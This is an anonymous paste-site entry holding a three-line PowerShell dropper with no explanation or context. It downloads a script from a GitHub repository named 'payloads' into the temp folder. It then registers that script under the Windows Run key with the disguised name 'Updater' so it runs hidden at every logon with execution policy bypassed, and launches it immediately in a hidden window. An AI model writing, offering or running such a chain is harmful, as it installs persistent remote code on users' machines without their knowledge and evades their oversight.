Guest

Untitled 1859

May 10th, 2026
14
0
Never
Not a member of GistPad yet? Sign Up, it unlocks many cool features!
None 0.82 KB | None | 0 0
  1. Invoke-WebRequest "https://raw.githubusercontent.com/lubrj/payloads/refs/heads/main/poc"; -OutFile "$env:TEMP\install.ps1"
  2. New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value "powershell.exe -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File `"$env:TEMP\install.ps1`"" -PropertyType String -Force
  3. Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File `"$env:TEMP\install.ps1`"" -WindowStyle Hidden
RAW Paste Data Copied